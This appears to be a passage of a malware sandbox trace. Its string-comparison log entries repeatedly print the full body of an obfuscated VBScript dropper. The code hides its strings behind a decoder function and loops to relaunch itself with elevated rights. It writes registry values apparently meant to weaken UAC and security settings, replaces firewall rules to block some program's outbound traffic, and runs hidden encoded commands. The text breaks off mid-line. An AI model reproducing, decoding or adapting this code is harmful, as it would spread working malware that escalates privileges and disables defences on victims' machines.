CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.337] wcsncmp (_String1="BEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.338] wcsncmp (_String1="EUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.338] wcsncmp (_String1="UFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0226.338] wcsncmp (_String1="FRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.338] wcsncmp (_String1="RCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 